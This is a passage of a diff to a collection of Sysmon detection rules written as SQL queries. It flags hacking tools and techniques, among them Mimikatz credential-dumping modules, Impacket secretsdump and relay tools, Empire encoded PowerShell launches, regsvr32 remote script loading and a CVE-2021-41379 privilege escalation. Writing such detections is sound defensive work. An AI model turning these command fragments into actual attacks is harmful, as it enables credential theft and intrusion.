"attack.collection", + "attack.t1560" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\CreateMiniDump.exe' ESCAPE '\\' OR Imphash = '4a07f944a83e8a7c2525efa35dd30e2f' OR Hashes LIKE '%IMPHASH=4a07f944a83e8a7c2525efa35dd30e2f%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%7za.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\\\C$\\\\temp\\\\log.zip%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_createminidump.yml" + "filename": "proc_creation_win_malware_conti_7zip.yml" }, { - "title": "Suspicious GrpConv Execution", - "id": "f14e169e-9978-4c69-acb3-1cff8200bc36", - "status": "experimental", - "description": "Detects the suspicious execution of a utility to convert Windows 3.x .grp files or for persistence purposes by malicious software or actors", - "author": "Florian Roth (Nextron Systems)", + "title": "Tor Client/Browser Execution", + "id": "62f7c9bf-9135-49b2-8aeb-1e54a6ecc13c", + "status": "test", + "description": "Detects the use of Tor or Tor-Browser to connect to onion routing networks", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1547" + "attack.command_and_control", + "attack.t1090.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%grpconv.exe -o%' ESCAPE '\\' OR CommandLine LIKE '%grpconv -o%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\tor.exe' ESCAPE '\\' OR Image LIKE '%\\\\Tor Browser\\\\Browser\\\\firefox.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_susp_grpconv.yml" + "filename": "proc_creation_win_browsers_tor_execution.yml" }, { - "title": "UAC Bypass Using 
IDiagnostic Profile", - "id": "4cbef972-f347-4170-b62a-8253f6168e6d", - "status": "experimental", - "description": "Detects the \"IDiagnosticProfileUAC\" UAC bypass technique", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Possible Shim Database Persistence via sdbinst.exe", + "id": "517490a7-115a-48c6-8862-1a481504d5a8", + "status": "test", + "description": "Detects installation of a new shim using sdbinst.exe. A shim can be used to load malicious DLLs into applications.", + "author": "Markus Neis", "tags": [ - "attack.execution", - "attack.defense_evasion", + "attack.persistence", "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1546.011" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\DllHost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '% /Processid:{12C21EA7-2EB8-4B55-9249-AC243DA8C666}%' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sdbinst.exe' ESCAPE '\\' AND CommandLine LIKE '%.sdb%' ESCAPE '\\') AND NOT (CommandLine LIKE '%iisexpressshim.sdb%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_uac_bypass_idiagnostic_profile.yml" + "filename": "proc_creation_win_sdbinst_shim_persistence.yml" }, { - "title": "Webshell Detection With Command Line Keywords", - "id": "bed2a484-9348-4143-8a8a-b801c979301c", + "title": "Suspicious Mshta.EXE Execution Patterns", + "id": "e32f92d1-523e-49c3-9374-bdb13b46a3ba", "status": "experimental", - "description": "Detects certain command line parameters often used during reconnaissance activity via web shells", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, Anton Kutepov, oscd.community", + "description": "Detects suspicious mshta process execution patterns", + "author": "Florian Roth (Nextron Systems), 
Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1505.003", - "attack.t1018", - "attack.t1033", - "attack.t1087" + "attack.execution", + "attack.t1106" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ws\\_tomcatservice.exe' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentImage LIKE '%-tomcat-%' ESCAPE '\\' OR ParentImage LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (CommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR CommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\'))) AND ((OriginalFileName IN ('net.exe', 'net1.exe') AND (CommandLine LIKE '% user %' ESCAPE '\\' OR CommandLine LIKE '% use %' ESCAPE '\\' OR CommandLine LIKE '% group %' ESCAPE '\\')) OR (OriginalFileName = 'ping.exe' AND CommandLine LIKE '% -n %' ESCAPE '\\') OR (CommandLine LIKE '%&cd&echo%' ESCAPE '\\' OR CommandLine LIKE '%cd /d %' ESCAPE '\\') OR (OriginalFileName = 'wmic.exe' AND CommandLine LIKE '% /node:%' ESCAPE '\\') OR ((Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\quser.exe' ESCAPE '\\' OR Image LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR Image LIKE '%\\\\pathping.exe' ESCAPE '\\' OR Image LIKE '%\\\\tracert.exe' ESCAPE '\\' OR Image LIKE '%\\\\netstat.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\tasklist.exe' ESCAPE 
'\\') OR OriginalFileName IN ('whoami.exe', 'sysinfo.exe', 'quser.exe', 'ipconfig.exe', 'pathping.exe', 'tracert.exe', 'netstat.exe', 'schtasks.exe', 'VSSADMIN.EXE', 'wevtutil.exe', 'tasklist.exe')) OR (CommandLine LIKE '% Test-NetConnection %' ESCAPE '\\' OR CommandLine LIKE '%dir \\\\%' ESCAPE '\\')))" - ], - "filename": "proc_creation_win_webshell_detection.yml" - }, - { - "title": "HackTool - GMER Rootkit Detector and Remover Execution", - "id": "9082ff1f-88ab-4678-a3cc-5bcff99fc74d", - "status": "experimental", - "description": "Detects the execution GMER tool based on image and hash fields.", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.defense_evasion" - ], - "falsepositives": [ - "Unlikely" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\gmer.exe' ESCAPE '\\' OR (Hashes LIKE '%MD5=E9DC058440D321AA17D0600B3CA0AB04%' ESCAPE '\\' OR Hashes LIKE '%SHA1=539C228B6B332F5AA523E5CE358C16647D8BBE57%' ESCAPE '\\' OR Hashes LIKE '%SHA256=E8A3E804A96C716A3E9B69195DB6FFB0D33E2433AF871E4D4E1EAB3097237173%' ESCAPE '\\') OR md5 = 'e9dc058440d321aa17d0600b3ca0ab04' OR sha1 = '539c228b6b332f5aa523e5ce358c16647d8bbe57' OR sha256 = 'e8a3e804a96c716a3e9b69195db6ffb0d33e2433af871e4d4e1eab3097237173'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND ((ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\') AND (CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' 
ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))) OR ((Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%.htm%' ESCAPE '\\' OR CommandLine LIKE '%.hta%' ESCAPE '\\') OR (CommandLine LIKE '%mshta.exe' ESCAPE '\\' OR CommandLine LIKE '%mshta' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_hktl_gmer.yml" + "filename": "proc_creation_win_mshta_susp_pattern.yml" }, { - "title": "PowerShell Base64 Encoded WMI Classes", - "id": "1816994b-42e1-4fb1-afd2-134d88184f71", + "title": "Regsvr32 Anomaly", + "id": "8e2b24c9-4add-46a0-b4bb-0057b4e6187d", "status": "experimental", - "description": "Detects calls to base64 encoded WMI class such as \"Win32_Shadowcopy\", \"\"...etc.", - "author": "Christian Burkard (Nextron Systems), Nasreddine Bencherchali", + "description": "Detects various anomalies in relation to regsvr32.exe", + "author": "Florian Roth (Nextron Systems), oscd.community, Tim Shelton", "tags": [ - "attack.execution", - "attack.t1059.001", "attack.defense_evasion", - "attack.t1027" + "attack.t1218.010", + "car.2019-04-002", + "car.2019-04-003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND ((CommandLine LIKE '%VwBpAG4AMwAyAF8AUwBoAGEAZABvAHcAYwBvAHAAeQ%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBTAGgAYQBkAG8AdwBjAG8AcAB5A%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfU2hhZG93Y29we%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1NoYWRvd2NvcH%' ESCAPE '\\' OR 
CommandLine LIKE '%XaW4zMl9TaGFkb3djb3B5%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8AUwBjAGgAZQBkAHUAbABlAGQASgBvAGIA%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFMAYwBoAGUAZAB1AGwAZQBkAEoAbwBiA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBTAGMAaABlAGQAdQBsAGUAZABKAG8AYg%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfU2NoZWR1bGVkSm9i%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1NjaGVkdWxlZEpvY%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9TY2hlZHVsZWRKb2%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8AUAByAG8AYwBlAHMAcw%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzA%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfUHJvY2Vzc%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1Byb2Nlc3%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9Qcm9jZXNz%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8AVQBzAGUAcgBBAGMAYwBvAHUAbgB0A%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFUAcwBlAHIAQQBjAGMAbwB1AG4AdA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBVAHMAZQByAEEAYwBjAG8AdQBuAHQA%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfVXNlckFjY291bn%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1VzZXJBY2NvdW50%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9Vc2VyQWNjb3Vud%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8ATABvAGcAZwBlAGQATwBuAFUAcwBlAHIA%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAEwAbwBnAGcAZQBkAE8AbgBVAHMAZQByA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBMAG8AZwBnAGUAZABPAG4AVQBzAGUAcg%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfTG9nZ2VkT25Vc2Vy%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX0xvZ2dlZE9uVXNlc%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9Mb2dnZWRPblVzZX%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\') OR (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (ParentImage LIKE 
'%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%/i:%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND CommandLine LIKE '%scrobj.dll' ESCAPE '\\') OR (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%/i:%' ESCAPE '\\' AND CommandLine LIKE '%ftp%' ESCAPE '\\' AND CommandLine LIKE '%scrobj.dll' ESCAPE '\\') OR ((Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\') AND ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\') OR (Image LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' AND CommandLine LIKE '%..\\\\..\\\\..\\\\Windows\\\\System32\\\\regsvr32.exe %' ESCAPE '\\') OR (ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\' AND Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\') OR (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\Local%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public%' ESCAPE '\\')) OR (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (CommandLine LIKE '%.jpg' ESCAPE '\\' OR CommandLine LIKE '%.jpeg' ESCAPE '\\' OR CommandLine LIKE '%.png' ESCAPE '\\' OR CommandLine LIKE '%.gif' ESCAPE '\\' OR CommandLine LIKE '%.bin' ESCAPE '\\' OR CommandLine LIKE '%.tmp' ESCAPE '\\' OR CommandLine LIKE '%.temp' ESCAPE '\\' OR CommandLine LIKE '%.txt' ESCAPE '\\'))) AND NOT (((CommandLine LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\WebEx\\\\WebEx64\\\\Meetings\\\\atucfobj.dll%' ESCAPE '\\')) OR (ParentImage LIKE 'C:\\\\Program Files\\\\Box\\\\Box\\\\FS\\\\streem.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\Program Files\\\\Box\\\\Box\\\\Temp\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%/s C:\\\\Windows\\\\System32\\\\RpcProxy\\\\RpcProxy.dll' ESCAPE '\\')))" ], - "filename": 
"proc_creation_win_powershell_base64_wmi_classes.yml" + "filename": "proc_creation_win_regsvr32_anomalies.yml" }, { - "title": "Sysmon Discovery Via Default Driver Altitude Using Findstr.EXE", - "id": "37db85d1-b089-490a-a59a-c7b6f984f480", + "title": "Potential CVE-2021-41379 Exploitation Attempt", + "id": "af8bbce4-f751-46b4-8d91-82a33a736f61", "status": "test", - "description": "Detects usage of \"findstr\" with the argument \"385201\". Which could indicate potential discovery of an installed Sysinternals Sysmon service using the default driver altitude (even if the name is changed).", - "author": "frack113", + "description": "Detects potential exploitation attempts of CVE-2021-41379 (InstallerFileTakeOver), a local privilege escalation (LPE) vulnerability where the attacker spawns a \"cmd.exe\" process as a child of Microsoft Edge elevation service \"elevation_service\" with \"LOCAL_SYSTEM\" rights", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1518.001" + "attack.privilege_escalation", + "attack.t1068" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND CommandLine LIKE '% 385201%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE', 'pwsh.dll')) AND (ParentImage LIKE '%\\\\elevation\\_service.exe' ESCAPE '\\' AND IntegrityLevel = 'System'))" ], - "filename": "proc_creation_win_findstr_sysmon_discovery_via_default_altitude.yml" + "filename": "proc_creation_win_exploit_cve_2021_41379.yml" }, { - "title": "Potential Recon Activity Via Nltest.EXE", - "id": 
"5cc90652-4cbd-4241-aa3b-4b462fa5a248", + "title": "Script Event Consumer Spawning Process", + "id": "f6d1dd2f-b8ce-40ca-bc23-062efb686b34", "status": "experimental", - "description": "Detects nltest commands that can be used for information discovery", - "author": "Craig Young, oscd.community, Georg Lauenstein", + "description": "Detects a suspicious child process of Script Event Consumer (scrcons.exe).", + "author": "Sittikorn S", "tags": [ - "attack.discovery", - "attack.t1016", - "attack.t1482" + "attack.execution", + "attack.t1047" ], "falsepositives": [ - "Legitimate administration use but user and host must be investigated" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\nltest.exe' ESCAPE '\\' OR OriginalFileName = 'nltestrk.exe') AND ((CommandLine LIKE '%/server%' ESCAPE '\\' AND CommandLine LIKE '%/query%' ESCAPE '\\') OR (CommandLine LIKE '%/dclist:%' ESCAPE '\\' OR CommandLine LIKE '%/parentdomain%' ESCAPE '\\' OR CommandLine LIKE '%/domain\\_trusts%' ESCAPE '\\' OR CommandLine LIKE '%/all\\_trusts%' ESCAPE '\\' OR CommandLine LIKE '%/trusted\\_domains%' ESCAPE '\\' OR CommandLine LIKE '%/user%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\scrcons.exe' ESCAPE '\\' AND (Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\msbuild.exe' ESCAPE '\\'))" ], - "filename": 
"proc_creation_win_nltest_recon.yml" + "filename": "proc_creation_win_scrcons_susp_child_process.yml" }, { - "title": "HackTool - Mimikatz Execution", - "id": "a642964e-bead-4bed-8910-1bb4d63e3b4d", + "title": "HackTool - Empire PowerShell Launch Parameters", + "id": "79f4ede3-402e-41c8-bc3e-ebbf5f162581", "status": "test", - "description": "Detection well-known mimikatz command line arguments", - "author": "Teymur Kheirkhabarov, oscd.community, David ANDRE (additional keywords), Tim Shelton", + "description": "Detects suspicious powershell command line parameters used in Empire", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.005", - "attack.t1003.006" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Other tools that incidentally use the same command line parameters" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%DumpCreds%' ESCAPE '\\' OR CommandLine LIKE '%mimikatz%' ESCAPE '\\') OR (CommandLine LIKE '%::aadcookie%' ESCAPE '\\' OR CommandLine LIKE '%::detours%' ESCAPE '\\' OR CommandLine LIKE '%::memssp%' ESCAPE '\\' OR CommandLine LIKE '%::mflt%' ESCAPE '\\' OR CommandLine LIKE '%::ncroutemon%' ESCAPE '\\' OR CommandLine LIKE '%::ngcsign%' ESCAPE '\\' OR CommandLine LIKE '%::printnightmare%' ESCAPE '\\' OR CommandLine LIKE '%::skeleton%' ESCAPE '\\' OR CommandLine LIKE '%::preshutdown%' ESCAPE '\\' OR CommandLine LIKE '%::mstsc%' ESCAPE '\\' OR CommandLine LIKE '%::multirdp%' ESCAPE '\\') OR (CommandLine LIKE '%rpc::%' ESCAPE '\\' OR CommandLine LIKE '%token::%' ESCAPE '\\' OR CommandLine LIKE '%crypto::%' ESCAPE '\\' OR CommandLine LIKE '%dpapi::%' ESCAPE '\\' OR CommandLine LIKE '%sekurlsa::%' ESCAPE '\\' OR CommandLine LIKE '%kerberos::%' ESCAPE '\\' OR CommandLine LIKE '%lsadump::%' ESCAPE '\\' OR 
CommandLine LIKE '%privilege::%' ESCAPE '\\' OR CommandLine LIKE '%process::%' ESCAPE '\\' OR CommandLine LIKE '%vault::%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '% -NoP -sta -NonI -W Hidden -Enc %' ESCAPE '\\' OR CommandLine LIKE '% -noP -sta -w 1 -enc %' ESCAPE '\\' OR CommandLine LIKE '% -NoP -NonI -W Hidden -enc %' ESCAPE '\\' OR CommandLine LIKE '% -noP -sta -w 1 -enc%' ESCAPE '\\' OR CommandLine LIKE '% -enc SQB%' ESCAPE '\\' OR CommandLine LIKE '% -nop -exec bypass -EncodedCommand %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_mimikatz_command_line.yml" + "filename": "proc_creation_win_hktl_empire_powershell_launch.yml" }, { - "title": "Sticky Key Like Backdoor Execution", - "id": "2fdefcb3-dbda-401e-ae23-f0db027628bc", + "title": "HackTool - Impacket Tools Execution", + "id": "4627c6ae-6899-46e2-aa0c-6ebcb1becd19", "status": "test", - "description": "Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen", - "author": "Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community", + "description": "Detects the execution of different compiled Windows binaries of the impacket toolset (based on names or part of their names - could lead to false positives)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.persistence", - "attack.t1546.008", - "car.2014-11-003", - "car.2014-11-008" + "attack.execution", + "attack.t1557.001" ], "falsepositives": [ - "Unlikely" + "Legitimate use of the impacket tools" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\winlogon.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' 
OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wt.exe' ESCAPE '\\') AND (CommandLine LIKE '%sethc.exe%' ESCAPE '\\' OR CommandLine LIKE '%utilman.exe%' ESCAPE '\\' OR CommandLine LIKE '%osk.exe%' ESCAPE '\\' OR CommandLine LIKE '%Magnify.exe%' ESCAPE '\\' OR CommandLine LIKE '%Narrator.exe%' ESCAPE '\\' OR CommandLine LIKE '%DisplaySwitch.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\goldenPac%' ESCAPE '\\' OR Image LIKE '%\\\\karmaSMB%' ESCAPE '\\' OR Image LIKE '%\\\\kintercept%' ESCAPE '\\' OR Image LIKE '%\\\\ntlmrelayx%' ESCAPE '\\' OR Image LIKE '%\\\\rpcdump%' ESCAPE '\\' OR Image LIKE '%\\\\samrdump%' ESCAPE '\\' OR Image LIKE '%\\\\secretsdump%' ESCAPE '\\' OR Image LIKE '%\\\\smbexec%' ESCAPE '\\' OR Image LIKE '%\\\\smbrelayx%' ESCAPE '\\' OR Image LIKE '%\\\\wmiexec%' ESCAPE '\\' OR Image LIKE '%\\\\wmipersist%' ESCAPE '\\') OR (Image LIKE '%\\\\atexec\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\dcomexec\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\dpapi\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\findDelegation\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\GetADUsers\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\GetNPUsers\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\getPac\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\getST\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\getTGT\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\GetUserSPNs\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\ifmap\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\mimikatz\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\netview\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\nmapAnswerMachine\\_windows.exe' ESCAPE '\\' OR Image LIKE 
'%\\\\opdump\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\psexec\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\rdp\\_check\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\sambaPipe\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\smbclient\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\smbserver\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\sniffer\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\sniff\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\split\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\ticketer\\_windows.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_cmd_sticky_key_like_backdoor_execution.yml" + "filename": "proc_creation_win_hktl_impacket_tools.yml" }, { - "title": "Potential Data Exfiltration Activity Via CommandLine Tools", - "id": "7d1aaf3d-4304-425c-b7c3-162055e0b3ab", + "title": "Webshell Detection With Command Line Keywords", + "id": "bed2a484-9348-4143-8a8a-b801c979301c", "status": "experimental", - "description": "Detects the use of various CLI utilities exfiltrating data via web requests", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects certain command line parameters often used during reconnaissance activity via web shells", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, Anton Kutepov, oscd.community", "tags": [ - "attack.execution", - "attack.t1059.001" + 